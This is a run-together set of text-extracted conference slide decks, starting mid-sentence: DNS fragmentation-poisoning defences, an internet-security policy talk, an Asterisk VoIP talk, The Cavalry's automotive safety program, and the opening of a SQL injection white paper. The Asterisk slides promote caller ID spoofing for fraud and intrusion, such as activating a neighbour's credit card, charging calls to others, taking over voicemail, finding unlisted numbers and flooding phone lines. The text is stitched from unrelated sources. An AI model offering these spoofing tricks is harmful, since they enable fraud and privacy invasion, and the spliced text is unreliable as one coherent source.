be in any order Identify and handle fragments as 'Suspect' (non-trivial) FOR RESOLVERS Date TBD Cap EDNS (Extended DNS) bufsize solicitation at ~1220 More feasible with elliptic-curve RRSIGs Avoid IPv6 fragmentation Drop all fragments (including IPv6) Re-query larger payloads over TCP Implement “Flag Day 2020+” plans now FOR RESOLVERS https://dnsflagday.net/2020/ Indications of this attack are… limited. But one can still make an alert for what little warning there is A large volume of unsolicited, fragmented, IPv6 ICMP Echo replies during collision-finding may be the only indication Though, this attack could be performed with sufficient IPv4 address space, or other protocols that allow for sufficiently tight-timing of responses. Be alerted (or very afraid) of unsolicited ECHO responses FOR RESOLVERS Have you tried turning it off and on again? For a host running modern Linux, changing the key used to hash destination addresses would silently remove any known collisions Obviously, even if this is done without a reboot - not ideal (traffic volume) In order of increasing difficulty… FOR NAMESERVERS Limit EDNS over UDP (“Flag Day 2020+”) Not really “Compliant” yet, but can still serve large responses over TCP Speed is important, but may be best left to the resolvers, most things can be cached FOR NAMESERVERS In order of increasing difficulty… https://dnsflagday.net/2020/ Disable, fuzz, or limit what ICMPs you respond to There are good reasons for responding to ICMP ECHOs (especially as a backbone-of-DNS) but… maybe not fragmented pings Handle ICMP separately with a non-kernel process (IPID) Limit speed of replying to ICMPs … but then again, ICMP *isn’t* the only way this attack could be done FOR NAMESERVERS In order of increasing difficulty… Roll your own Kernel (sorry in advance) or use another Change IP_IDENTS_SZ to something much higher than 2048, recompile. Alternatively, use a kernel that is properly per-destination and take the performance hit https://xkcd.com/303/ FOR NAMESERVERS In order of increasing difficulty… Deploy DNSSEC … and do it with good signing keys Although DNSSEC produces longer replies (fragmentation), it also prevents outright tampering with A records. If you have a weak key your replies would be fragmentable, and the signing could be broken. https://www.iana.org/dnssec/dps/zsk-operator/dps-zsk-operator-v2.0.pdf Key Signing Key (KSK) Zone Signing Key (ZSK) A www.defcon.org w.x.y.z RRSIG A 10 3 2419200 2019 ... Which authenticates Makes RRSIGs for records FOR DOMAINS https://www.iana.org/dnssec/dps/zsk-operator/dps-zsk-operator-v2.0.pdf https://blog.webernetz.net/dnssec-zsk-key-rollover/ FOR DOMAINS Deploy DNSSEC … and do it with good signing keys Although DNSSEC produces longer replies (fragmentation), it also prevents outright tampering with A records. If you have a weak key your replies would be fragmentable, and the signing could be broken. FOR EVERYBODY ELSE… DON’T PANIC (well... maybe panic a little) ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path - Zhang, Knockel, and Crandell Fragmentation Considered Poisonous - Herzberg and Shulman Two Main Papers: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/net/i pv4/route.c#n476 IP_IDENTS_SZ in current Linux kernel: Speakers trpalmer@cisco.com Twitter: @Travco1 Travis (Travco) Palmer brian@Awfulhak.org Brian Somers D. Kaminsky. It’s The End Of The Cache As We Know It. In Black Hat conference, 2008. http://www.doxpara.com/DMK_BO2K8.ppt. The O.G. Kaminsky: https://www.cloudflare.com/dns/dnssec/how-dnssec-works/ https://www.icann.org/news/announcement-2019-02-22-en https://www.internetsociety.org/resources/doc/2016/state-of-dnssec-deployment-2016/ https://indico.dnsoarc.net/event/31/contributions/692/attachments/660/1115/fujiwara-5.pdf “Counting Packets Sent Between Arbitrary Internet Hosts”, Jeffrey Knockel and Jedidiah R. Crandall, 2014 https://dnsflagday.net/2020/ https://www.iana.org/dnssec/dps/zsk-operator/dps-zsk-operator-v2.0.pdf Other resources in order of appearance:
SAVING THE INTERNET Jay Healey @Jason_Healey Atlantic Council ~1436 ~1454 “If  there  is  something  you  know,   communicate it. If there is something you don't know,  search  for  it.” Violates Privacy? Civil Liberties? Legal? Constitutional? “If  there  is  something  you   know, communicate it. If there is something you don't  know,  search  for  it.” Global Internet Users 1993: 14 million 2003: 778 million 2013: 2.7 billion 2030? 2280? Data breaches Cyber crime Anonymous Malware Espionage State-sponsored attacks Stuxnet Heartbleed Erection of borders … … … Privacy Civil Liberties Security sep Future Economic and National Security Today’s  National   Security Today’s  National   Security Future Possibilities Until the End of Humankind Today’s  National   Security How many future Renaissances and Enlightenments will humanity miss if we – all of us, for any purpose – keep treating the Internet as a place for crime, warfare and espionage? SECURITY FROM WHAT The DT and complexity Why  “Saving” Global Shocks Initiated or Amplified Through the Internet “As  society  becomes  more   technologic, even the mundane comes to depend on distant digital  perfection.”       Dan Geer “This  increasingly  tight  coupling  of  the   internet with the real economy and society means a full-scale cyber shock is far more likely  to  occur.”   “Beyond  Data  Breaches:  Global   Interconnections  of  Cyber  Risk” Bad Guys Finish First “Few if any contemporary computer security controls have prevented a [red team] from easily accessing any information sought.” Bad Guys Finish First “Few if any contemporary computer security controls have prevented a [red team] from easily accessing any information sought.” O>D Doesn’t  Have  to  Stay  This  Way Great News! Security is Getting Better! Whether in detection, control, or prevention, we are notching personal bests… - Dan Geer, 2014 Time Effectiveness 2014 Improvement of Defense Bad  News!  We’re  Still  Losing  and  at  a  Faster Rate! Time Effectiveness Improvement of Defense 2014 Whether in detection, control, or prevention, we are notching personal bests but all the while the opposition is setting world records. Dan Geer, 2014 Improvement of Offense “Wild  West” Or Is It Exponentially Worse? Time Effectiveness Improvement of Defense 2014 Improvement of Offense Can This Last Forever? Time Effectiveness Improvement of Defense 2014 Improvement of Offense Tipping Point? When Will There Be More Predators Than Prey? Time Effectiveness 2014 O>D O>>D “Somalia” “Wild  West” Tipping Point? SAVING FOR WHOM? 2014 2024 2034 2074 2274 Poster by Paul Sizer SOLUTIONS D>O D>>O Solutions How you can help Believe: The  DT’s  quote Care: That you can matter Join: Give your time, brains and patience Measure : To be sure Private-Sector Centric Approach Single US Cyber & Internet Strategy • Disruptive  Defensive  Technologies  …  but  only  if  they  work  at  scale! • Sustainable Internet • Working at Scale Twitter: @Jason_Healey Questions?
Be your own telephone company... ...with Asterisk! Presented by Strom Carlson and Black Ratchet DEFCON 13 July 2005 Brief history of telephone switching ● Manual cordboards – Labor-intensive ● Step / Panel / Crossbar – Electromechanical – Simple and effective, but limited in function – Expensive to maintain ● No. 1 / 1AESS – Electronically-controlled analog switching – Much wider array of services available – More flexibility than electromechanical switches – Some still in use today in North America Brief history of telephone switching ● 4 ESS / 5 ESS / DMS – Digital time-division switching – Greatly increased flexibility and array of services – Much cheaper to maintain than previous systems – Huge and expensive Part I: Asterisk Overview (or... what the &$#%@ is this thing?) What is Asterisk? ● Free, open-source PBX that runs on Linux – Best thing since sliced bread ● Originally written by Mark Spencer – Now has a large number of contributors Why Asterisk? ● It's FREEEEEEEEEEEEEEEEEEEE!!!!!!! – How much are you paying your PBX vendor now? ● Runs on commodity PC hardware ● Broad support for VoIP protocols and hardware ● Easy to interconnect with other boxes – Form your own VoIP network ● Configurable to do (almost) whatever you want – Tweak it to your needs – Write your own code – It will still not do your dishes, unfortunately Asterisk and Hardware Asterisk Hardware Requirements ● Will run on surprisingly out-of-date hardware – 133MHz Pentium I w/16MB RAM ● supports 3 concurrent SIP calls before quality degrades ● Any PC you have lying around will work – 2.4 GHz P4 w/512 MB RAM ● 790 simultaneous calls http://www.voip-info.org/wiki-Asterisk+dimensioning Sample Asterisk Installation Asterisk Web Mail Catsex NAS Asterisk Console Popular VoIP Telephones Cisco 7960 $250-$300 Polycom IP600 $250-$300 Grandstream BudgeTone 100 $40-$75 Snom 190 $175-$250 Popular VoIP Terminal Adapters Digium IAXy $100 Sipura SPA-2002 $70 Grandstream HandyTone 286 $65 Cisco ATA-186 $50-$125 Digium Zaptel Cards ● TDM400P – Connect analog telephones to asterisk box – Connect analog telephone lines to asterisk box ● TE405P / TE410P – Connect four T1 / E1 circuits to asterisk box – Connect channel banks to asterisk box Interconnecting Asterisk: Signaling Protocols Session Initiation Protocol (SIP) ● Signaling protocol only – Actual media transport handled by RTP ● Protocol developed by IETF, not ITU-T – Uses URLs instead of telephone numbers ● sip:strom@stromcarlson.com ● Intended to be a peer-to-peer protocol ● Fairly ubiquitous – Most VoIP phones, terminal adapters, etc speak SIP – Used by Vonage, Packet8, Broadvoice, etc ● Does not play well with NAT H.323 ● Developed in 1996 by ITU-T ● Far more similar to traditional telephony signaling protocols than SIP ● Uses RTP for media transport ● Used internally by interexchange carriers ● Fairly unpopular in the do-it-yourself VoIP world – Difficult to implement in software – Major pain in the ass to get working correctly “Just don't use H.323 and all your problems will be solved” - JerJer on #asterisk Inter-Asterisk EXchange (IAX) ● Developed by Mark Spencer of Digium ● Covers both signaling and media transport – Streamlined, simple protocol ● Does not suffer from NAT traversal issues – Data and signaling happen via UDP on port 4569 ● Well-supported by Asterisk ● Support in terminal equipment is rare – Digium IAXy terminal adapter speaks IAX ● Preferred protocol for many PSTN termination providers Other protocols ● Media Gateway Control Protocol (MGCP) ● Cisco's Skinny Client Control Protocol (SCCP) Interconnecting Asterisk: Codecs Digital Audio Basics – PAM Analog Waveform Pulse Amplitude Modulation (PAM) Digital Audio Basics – PCM Pulse Amplitude Modulation (PAM) Pulse Code Modulation (PCM) Digital Audio Basics – µ-law 10110110 Polarity Chord Step 0 1 -1 Digital Audio Basics – (A)DPCM ● Differential Pulse Code Modulation – Uses four bits to describe the change from the last sample, regardless of original source resolution ● Adaptive Differential PCM – Uses a varying number of bits depending on the complexity of the sample Digital Audio Basics – LPC ● Linear Predictive Coding ● Uses vocoders to compress speech – Vocoders are also used to create the “singing synthesizer” effect in some modern music Voice on the PSTN ● 64 kilobit per second synchronous bandwidth for wireline telephones – µ-law companding in North America – a-law companding in the rest of the world – 56 kilobits per second if doing in-band supervision signaling on a DS0 (i.e. bit-robbing) ● 4 to 13 kilobit per second synchronous bandwidth for mobile phones – All sorts of crazy audio codecs – Sounds like crap Costs of speech compression ● Increased CPU power required for transcoding ● No guarantee that two pieces of equipment will speak the same codecs – Especially true if using nonstandard bitrates ● Some codecs require LICEN$ING ● Codecs do not handle all kinds of sounds well – People will have trouble understanding certain words – Difficult to understand anyone who has poor diction – Music on hold in codec land is pure torture ● Be like Oedipus! Gouge your eyes out! Benefits of speech compression ● Each call uses less bandwidth Codecs supported by Asterisk ● G.711 – 64kbps µ-law or a-law companding ● G.726 – 32kbps Adaptive Differential Pulse Code Modulation ● G.729 – 8kbps Conjugate-Structure Algebraic Code-Excited Linear Prediction – Requires a license ● GSM – 13kbps Regular Pulse Excitation Long-Term Prediction Codecs supported by Asterisk ● Internet Low Bandwidth Codec (iLBC) – 13.3kbps Linear Predictive Coding – This is the codec used by Skype ● Speex – 13.3kbps Code-Excited Linear Prediction – Open Source codec ● LPC10 – 2.4kbps Linear Predictive Coding – Sounds more ghastly than you can possibly imagine Codec Comparison Audio Demo Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com Codec Comparison Audio Demo 5 Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com Codec Comparison Audio Demo 4 Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com Codec Comparison Audio Demo 3 Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com Codec Comparison Audio Demo 2 Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com Codec Comparison Audio Demo 1 Music: Redeye Flight - “Natalie” (band from Los Angeles – they're cool – go see their shows) redeyeflight_band@yahoo.com G.711 64kbps µlaw companding G.729 8kbps Conjugate-Structure Algebraic Code-Excited Linear Prediction G.726 32kbps Adaptive Differential Pulse Code Modulation GSM 13kbps Regular Pulse Excitation Long-Term Prediction G.711 64kbps µlaw companding iLBC 13.3kbps Linear Predictive Coding LPC-10 2.4kbps Linear Predictive Coding Speex 13.3kbps Code-Excited Linear Prediction Interconnecting Asterisk: PSTN Termination NuFone ● Pros – Cheap rates – Geared for Asterisk – Spoofable CallerID – Insanely easy to provision 800 numbers – Very easy going – Calling Party Number delivery – Proper call completion progress ● Cons – Michigan DIDs only – Not too phreak friendly ● Disabled Caller ID spoofing during DC12 (Geee, think he doesn't trust us?) Asterlink ● Pros – Reliable – Inbound via tollfree numbers – Delivers ANI II if you want it – Proper call progress ● Cons – Kludgy account management interface Voicepulse Connect ● Pros – Unlimited incoming minutes on inbound IAX calls – Inbound numbers in a large number of rate centers – Proper call progress ● Cons – One of the most expensive IAX providers for outbound PSTN call termination VoipJet ● Pros – Cheap! (1.3 cents per minute) ● Cons – Caller ID delivery unreliable – No incoming service – No proper call completion ● Instead of hearing an intercept message, you'll just hear ringing BroadVoice ● Pros – Cheap DIDs in most ratecenters – Run by phone phreaks – 24/7 Phone Support – Caller ID with name ● Cons – SIP Only – Prone to service outages – Phone support is slow at best – Will CNAM work today? Interconnecting Asterisk: Network Design ENUM / E.164 ● Based on DNS ● Allows any number to be queried – If it exists, you can bypass the PSTN saving money. ● Designed by the ITU ● Officially 'supposed' to be used by Telcos – e164.org – Free DIY solution ● Over 350,000 Numbers on record ● 78,000,000 Special PSTN services (800 numbers, etc) How ENUM Works ENUM problems ● A very 'top-down' way of doing lookup – Centrally managed – Centrally served – Centrally centralized ● Not in use by any(?) PSTN providers – Why should they save YOU money? ● Nowhere near critical mass yet DUNDi - Distributed Universal Number Discovery ● Designed by the good folks at Digium – Therefore, it has to be good ● A fully peer-to-peer E.164 solution ● Easily set up your own telephone network with friends ● DIY alternative to waiting for your telephone company to implement E.164 How DUNDi works http://www.dundi.com/dundi-e164-big.png DUNDi Problems ● Requires everyone to be honest – Hey Hey! I'm the white house! ● Scalability ● Not officially a standard (yet) ● Only in CVS HEAD version of asterisk ● The 'i' looks silly at the end. Quality of Service ● Ensure that calls receive enough bandwidth and low latency – Priority Queueing – Bandwidth Shaping ● Many residential routers are now VoIP-aware and will do a decent job out-of-the-box ● Tweak a Cisco router to do this on a large scale or if you're a control freak Part II: Extending Asterisk AGI – Asterisk Gateway Interface ● Interface for adding functionality to Asterisk ● Cross-Language – Perl – C – PHP – Whatever you want... ● Allows programs to communicate to asterisk via STDIN and STDOUT ● Second-best thing since sliced bread A simple AGI program #!/bin/bash # # Simple agi example reads back Caller ID # # Written by: Black Ratchet <blackratchet@blackratchet.org> # # Suck in the variables from asterisk declare -a array while read -e ARG && [ "$ARG" ] ; do array=(` echo $ARG | sed -e 's/://'`) export ${array[0]}=${array[1]} done checkresults() { while read line do case ${line:0:4} in "200 " ) echo $line >&2 return;; "510 " ) echo $line >&2 return;; "520 " ) echo $line >&2 return;; * ) echo $line >&2;; #keep on reading those Invalid command #command syntax until "520 End ..." esac done } # Say the user's Caller ID echo "STREAM FILE yourcalleridis \"\"" checkresults echo "SAY DIGITS " $agi_callerid "\"\"" checkresults How it works... Connection “agi_callerid: 3115552368” “STREAM FILE agi-yourcalleridis” “Your caller ID is...” “200 result=0” “200 result=0” “200 result=0” “SAY DIGITS “3115552368” “3...1...1...5...5...5...2...3...6...8...” Disconnection HANGUP “200 result=0” Caller AGI Script Asterisk Asterisk::AGI ● Perl module that simplifies AGI programming – Takes care a lot of the 'dirty work' – “Doing the work so you don't have to” ● Allows the AGI interface to be controlled via an object interface ● Rather old; not very well maintained ● Allows AGI to easily integrate with Perl, which easily integrates with almost everything in the known universe. ● http://asterisk.gnuinter.net/ A simple AGI program w/Asterisk:AGI #!/usr/bin/perl # # Simple AGI example that says the Caller ID w/Asterisk::AGI # # Written by: Black Ratchet <blackratchet@blackratchet.org> # use Asterisk::AGI; $AGI = new Asterisk::AGI; # Suck in the variables from asterisk my %input = $AGI->ReadParse(); # Speak the user's caller ID (If they have one) if ($input{'callerid'}) { $AGI->stream_file('yourcalleridis'); $AGI->say_digits($input{'callerid'}); } Wow... That was easier... Interacting with your script - Input ● Touch Tone – Basic – Ubiquitous – Easy – Limited ● VXML – eXtensible – No native support – SIPxPBX – Numerous Commerical offerings Interacting with your script - Output ● Text to Speech – Festival ● Native Support ● Free ● Sounds like crap – Cepstral ● Can easy be integrated ● Sounds great ● Not free, but cheap Interacting with your script - Output ● Recordings – Do it yourself ● Free – Allison Smith ● For pay ● Lots of canned sayings A slightly more complex script... #!/usr/bin/perl # # Simple agi example that demonstrates input and output # # Written by: Black Ratchet <blackratchet@blackratchet.org> # use Asterisk::AGI; $AGI = new Asterisk::AGI; while (1){ $input = chr($AGI->stream_file('seeandsay/menu','123')); if ($input eq "1"){ $AGI->stream_file('seeandsay/ratchet'); }elsif($input eq "2"){ $AGI-> stream_file('seeandsay/cepstralsays'); $AGI-> stream_file('seeandsay/cepstral'); }elsif($input eq "3"){ $AGI-> stream_file('seeandsay/allisonsays'); $AGI-> stream_file('seeandsay/allisonhello'); } } (intermission) Part II(a): Cool Applications (or... what can I do with this thing?) Caller ID Spoofing ● Asterisk allows you to set your own Caller ID, much like a PRI ● Certain PSTN termination providers will also set your Calling Party Number of your SS7 IAM to this number as well ● Most switches blindly accept this information, some more then others – 5ESS – Caller ID – DMS-100 – Caller ID – GTD-5 – Caller ID with Name Caller ID & CPN Spoofing uses... ● Confuse and Amuse your friends – How many times have you received a call from “Simpson, Homer J” ? ● Activate your neighbor's credit card ● Charge calls to people you don't like – Slightly more complex – Requires certain phone equipment to be misconfigured – Easiest way to do this is via a certain company's calling card Caller ID & CPN Spoofing uses... ● Own Paris Hilton's voice mail – T-Mobile upgraded their system, but is still vulnerable ● Social Engineering – Because hey... Caller ID is always right... right? Simple Caller ID Spoofing Scripts ● Nick84 – http://www.rootsecure.net/ ● NotTheory – http://www.bellsmind.net/ Backspoofing ● Related to Caller ID Spoofing ● Relatively new concept – NotTheory - http://www.bellsmind.net/ – Natas - http://www.oldskoolphreak.com/ – Vox - http://xscans.united.net.kg/ ● Fools the phone company into providing the name associated with a telephone number – Listed and Unlisted Backspoofing ● How it works – Spoof Caller ID to yourself – Your LEC looks up the number in its Caller ID database (CNAM) – You get the name associated with that number Backspoofing Uses ● Prescanning – Allows you to prioritize the more interesting phone numbers. ● “NET - 5ESS” ● “OFC# 897 TEST L” ● “VERIZON INFORMA” ● “CIA, INTERNATION” ● “BOOZE” ● “UNCLAIMED MONEY” ● Uber-cheap reverse lookup ● Figure out celebrities' cell phone numbers – Lindsay Lohan – Nikki Hilton Backspoofing Super Caller ID ● Extrapolates tons of useless data from a telephone number – Name and address from whitepages.com – Switch information from LERG ● Runs on its own dedicated WYSE 150 ● Hacked up in an hour by Strom Carlson ● A less customized version (non-LERG) available at http://www.oldskoolphreak.com/ Super Caller ID Rigging Radio Contests... ● Radio stations have a 'hunt group' for their contest lines – Hunt group – A single telephone number that 'hunts' for free wire pairs on a switch. – Back in the day, crackers would busy out hunt line at the switch, disallowing the public to call it, while calling the individual lines directly – Result: They win, public loses, line is re-enabled back after the contest, everyone is none the wiser. – Dark Dante (Kevin Poulsen) used this method to win a Porsche Tipping the scales in your favor... ● Shouts to Natas & NotTheory ● Certain providers allow numerous simultaneous outbound calls (hundreds in some cases) – DS1 = 24 calls – DS3 = 672 calls ● Radio station hunt groups can have around 20 lines on their hunt group ● What happens if they are suddenly inundated with 300 calls? – Won't guarantee a win, but will definitely increase your chances How it works Still some problems ● After you win, calls that are still in the queue will connect to the bridge if answered. – Radio Station Guy 1: “Hey! You win” – You: “Phonetastic!” – Radio Station Guy 2: “Hey, we already have a winner!” – Radio Station Guy 1: “Whaaaa?!” ● No easy way to fix this (?) Other possible uses ● Rigging telephone voting contests ● Telephone DoS ● Telling PBS to wrap up their pledge break and get back to Red Dwarf ● Busying out lines ● Racking up 800 number charges Nmap-by-phone ● Simple script that allows you to port scan from your phone ● Scan a computer from any payphone in the world ● Impress your friends ● Own microsoft.com while driving to work ● Almost but not entirely useless beyond the coolness factor Your own personal assistant ● Read your e-mail over the phone – Can't dictate messages (Yet) ● Not as cool as WildFire or Webley – http://www.wildfire.com/ – http://www.webley.com/ ● Insanely cheaper than wildfire or Webley ● VXML would make this much much cooler Part II(b) DEFCON by phone DEFCON by Phone ● Problem: Massive Def Con Schedule – Hard to memorize – Times and locations change – “Was that presentation on Friday or Saturday?” – “Crap! I missed So-and-So's presentation!” – This is 2005! Who really wants to carry around a schedule made of dead trees? DEFCON by Phone (cont.) ● Solution: Def Con By Phone! – Allows searching of Def Con schedule – Reminds users when presentations start ● Reminders can be set for up to one hour before a presentation, allowing the user to get in line. – Alerts users to when a presentation changes – Allows users to keep “in touch” with the con despite their location (IE: Blackjack Tables!) – Allows users to get their very own phone call from Strom Carlson, phone phreak extrodanaire! DEFCON by Phone (cont.) ● Features – Search available to anyone that calls – Quick reminder (Tells user what is coming in the next hour) – User Registration – Registered users can: ● Add reminders ● Delete reminders ● Be notified if event venues or times change ● Be notified if events are cancelled DEFCON by Phone (cont.) ● How it works – Database driven (Duh) – Over 250 audio clips – AGI handles user registration, searching, and reminders. – Daemon checks for reminders every 10 seconds and generates callfiles for reminders ● Limited only by bandwith (100Mbps) and the PSTN termination provider (hundreds of calls) – Web interface controls the addition of events and changing times of presentation. Defcon By Phone Demo Code and assorted info available at http://www.blackratchet.org/ http://www.stromcarlson.com/ Part III: Caveats (or, why asterisk sucks) TDM Card Flakiness ● Connecting an FXS module to a real telephone line can be dangerous – If the phone line rings, the FXS module is toast ● Cards sometimes go crazy for no apparent reason ● Drivers are not entirely bug-free Code Restrictions ● Asterisk is GPL ● All code contributed to Asterisk is owned by Digium – You waive your rights – You don't own your code – They need to have your wavier on record to contribute ● Digium does have commericial options (?) Termination Issues ● Proper call progression – Supported in protocols – Some providers (notably VoipJet) don't support it – Tough luck if you want to hear intercepts ● Most providers have nowhere near 99.999% uptime – Broadvoice had a large outage both inbound and outbound ● Some providers 'lose' your registration, requiring a kick to Asterisk Part IV: Q&A Q&A by phone! Call on in! Harass us from your hotel room! 1-800-4-CATSEX Further Reading and Resources ● http://www.asterisk.org/ ● http://www.blackratchet.org/ ● http://www.digium.com/ ● http://www.stromcarlson.com/ ● http://www.voip-info.org/ ● http://www.voipsupply.com/
Joshua Corman && Nicholas J. Percoco The Cavalry Year[0] A Path Forward for Public Safety Our Dependance on Technology is Growing Faster than our Ability to Secure it. Our Dependance on Technology is Growing Faster than our Ability to Secure it. Problem Statement: While we struggle to secure our organizations, connected technologies now permeate every aspect of our lives; in our cars, our bodies, our homes, and our public infrastructure. Our Mission: To ensure technologies with the potential to impact public safety and human life are worthy of our trust. Collecting, Connecting, Collaborating, Catalyzing Our Approach: Collecting existing research and researchers towards critical mass. Our Approach: Connecting researchers with each other and stakeholder in media, policy, legal, and affected industries. Our Approach: Collaborating across a broad range of background and skill sets. Our Approach: Catalyzing research and corrective efforts sooner than would happen on their own. Our Approach: One thing is clear… The Cavalry Isn't Coming It Falls To Us It Falls To YOU! One thing is clear… The Cavalry Isn't Coming It Falls To Us We must be ambassadors of our profession We must be the voice of technical literacy We must research that which matters We must amplify our efforts We must escape the echo chamber We must team with each other Year[0] Activities Year[0] Activities Research Conferences Government Industry Press Deliverables People What Worked Well What Worked Well The Mission •The problems statement, instinct & timing were right. While pieces of this were tried before, timing matters… ! Collecting, Connecting, Collaborating, Catalyzing •Teamwork and collective knowledge proved immediately useful to existing research & researchers. E.g. in Medical & Auto ! It Takes a Guild •Diverse, but complementary skills made us stronger - including people from industry and from government What Worked Well (cont’d) Finding Members to Educate Us •To ready ourselves to be better ambassadors to the outside world •To train us on Professional Development and Soft Skills ! Outside Interest, Feedback, New Members •Tangible results fueled interest and commitment •Positive and constructive feedback loops ! What Worked (Less Well) Too Much Initial Scope •“Body, Mind & Soul” focused more on “Body” •AKA “Public Safety & Human Life” ! Poor Project Management •In lieu of concrete, bite-sized roles & tasks willing parties grew impatient ! Poor Balance •Discrete progress vs external communication •The void was often filled w/ false information & avoidable friction What Worked (Less Well) Surprises Surprises Soft Skills •It was clear early we needed to build muscles in things like: •Communication Empathy •Professional Media Training •Eliminate/Soften Our Jargon ! Public Policy •We found incredible and unlikely allies here •Congressional Staffers were more savvy than we expected Industry Reception •Affected Industries had people VERY ready for the help who proved to be amazing guides and assets ! The Mission •The Mainstream Media & Policy makers found the mission clear & compelling instantly •Buy-in Opened More Avenues Surprises The “Legal Entity” 501(c)(3) Educational 501(c)(4) Lobbying 501(c)(6) Professional For Profit Various Forms The “Legal Entity” • All of our options came with trade-offs… • We are now seeking a 501(c)(3) • After forming the business plan, core work, identity, etc. this appears to be the best of our options • We've explored being "Adopted" by an existing 501(c)(3) • If "adoption" doesn't work, we will file directly 501(c)(3) Educational The “Legal Entity” Changes Going Forward Changes Going Forward • More Self-Service & Structured Support • Better Communication • Transparency in Projects & Decisioning • Production of Public Education Deliverables • Initiation of “Cavalry Summit” • Events per target industry • Auto/Medial/Home/Infrastructure • More International Balance/Reach An Open Letter to the Automotive Industry: Collaborating for Safety An Open Letter to the Automotive Industry: Collaborating for Safety ! ! Five Star Automotive Cyber Safety Program ! 1. Safety by Design 2. Third-Party Collaboration 3. Evidence Capture 4. Security Updates 5. Segmentation & Isolation Five Star Automotive Cyber Safety Program 1. Safety by Design a. VALUE: We take public safety seriously in our design, development, and testing. ! b. PROOF: As such, we have published an attestation of our secure software development lifecycle, summarizing our design, development, and adversarial testing programs for our products and our supply chain. ! Five Star Automotive Cyber Safety Program 2. Third-Party Collaboration a. VALUE: We recognize that our programs will not find all flaws. b. PROOF: As such, we have a published coordinated disclosure policy inviting the assistance of third- party researchers acting in good faith. Five Star Automotive Cyber Safety Program 3. Evidence Capture a. VALUE: We learn from failures and fuel continuous improvement. b. PROOF: As such, our systems provide tamper evident, forensically sound logging and evidence capture to facilitate safety investigations. Five Star Automotive Cyber Safety Program 4. Security Updates a. VALUE: We recognize the need to address newly discovered safety issues. b. PROOF: As such, our systems can be securely updated in a prompt and agile manner. Five Star Automotive Cyber Safety Program 5. Segmentation & Isolation a. VALUE: We believe a compromise of non-critical systems (like entertainment) should never adversely affect critical/physical systems (like braking).
 b. PROOF: As such, we have published an attestation of the physical/logical isolation and layered defense measures we have implemented. ! Five Star Automotive Cyber Safety Program Sign the Petition and Share it! ! http://bit.ly/5starauto! Possible Futures Attitude How to Get Involved How to Get Involved • Get a Job in a Target Industry • Research Target Technologies • Speak at Target Industry Events • Help Educate Policy Makers & Media ! • Join the Mailing List - http://bit.ly/thecavalry • Follow on Twitter - @IamTheCavalry • Provide Feedback - info@IamTheCavalry.org The Cavalry The Cavalry isn’t coming isn’t coming isn’t coming it falls to us it falls to you it falls to us it falls to you I am I am The Cavalry You are The Cavalry We are The Cavalry I am The Cavalry I am I am a father I am a son I am a mother I am a daughter I am a citizen I am a Voice of Reason I am The Cavalry (and so are you) I am The Cavalry (and so are you) The Cavalry I am @iamthecavalry
© 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 1 SQL Injection Are Your Web Applications Vulnerable? A White Paper from SPI Dynamics © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 2 TABLE OF CONTENTS 1. OVERVIEW AND INTRODUCTION TO WEB APPLICATIONS AND SQL INJECTION3 1.1. Overview ....................................................................................................................................................3 1.2. Background................................................................................................................................................3 1.3. Character encoding...................................................................................................................................3 2. TESTING FOR VULNERABILITY............................................................................................. 4 2.1. Comprehensive testing..............................................................................................................................4 2.2. Testing procedure......................................................................................................................................4 2.3. Evaluating results......................................................................................................................................5 3. ATTACKS....................................................................................................................................... 6 3.1. Authorization bypass ................................................................................................................................6 3.2. SELECT.....................................................................................................................................................7 3.2.1. Direct vs. Quoted....................................................................................................................................7 3.2.2. Basic UNION .........................................................................................................................................8 3.2.3. Query enumeration with syntax errors .................................................................................................10 3.2.4. Parenthesis............................................................................................................................................10 3.2.5. LIKE queries ........................................................................................................................................12 3.2.6. Dead Ends.............................................................................................................................................13 3.2.7. Column number mismatch....................................................................................................................13 3.2.8. Additional WHERE columns ...............................................................................................................18 3.2.9. Table and field name enumeration .......................................................................................................19 3.2.10. Single record cycling .......................................................................................................................21 3.3. INSERT....................................................................................................................................................24 3.3.1. Insert basics ..........................................................................................................................................24 3.3.2. Injecting subselects...............................................................................................................................24 3.4. SQL Server Stored Procedures..............................................................................................................25 3.4.1. Stored procedure basics........................................................................................................................25 3.4.2. xp_cmdshell..........................................................................................................................................26 3.4.3. sp_makewebtask...................................................................................................................................27 4. SOLUTIONS................................................................................................................................. 29 4.1. Data sanitization......................................................................................................................................29 4.2. Secure SQL web application coding ......................................................................................................29 5. DATABASE SERVER SYSTEM TABLES ............................................................................... 30 5.1. MS SQL Server........................................................................................................................................30 5.2. MS Access Server ....................................................................................................................................30 5.3. Oracle .......................................................................................................................................................30 6. THE BUSINESS CASE FOR APPLICATION SECURITY .................................................... 31 © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 3 1. Overview and introduction to web applications and SQL injection 1.1. Overview SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first. Despite being remarkably simple to protect against, there is an astonishing number of production systems connected to the Internet that are vulnerable to this type of attack. The objective of this paper is to educate the professional security community on the techniques that can be used to take advantage of a web application that is vulnerable to SQL injection, and to make clear the correct mechanisms that should be put in place to protect against SQL injection and input validation problems in general. 1.2. Background Before reading this, you should have a basic understanding of how databases work and how SQL is used to access them. I recommend reading eXtropia.com’s “Introduction to Databases for Web Developers” at http://www.extropia.com/tutorials/sql/toc.html. 1.3. Character encoding In most web browsers, punctuation characters and many other symbols will need to be URL encoded before being used in a request in order to be interpreted properly. In this paper I have used regular ASCII characters in the examples and screenshots in order to maintain maximum readability. In practice, though, you will need to substitute %25 for percent sign, %2B for plus sign, etc. in the HTTP request statement. © 2002 SPI Dynamics, Inc. All Right Reserved. No reproduction or redistribution without written permission. Page 4 2. Testing for vulnerability 2.1. Comprehensive testing Thoroughly checking a web application for SQL injection vulnerability takes more effort than one might guess. Sure, it's nice when you throw a single quote into the first argument 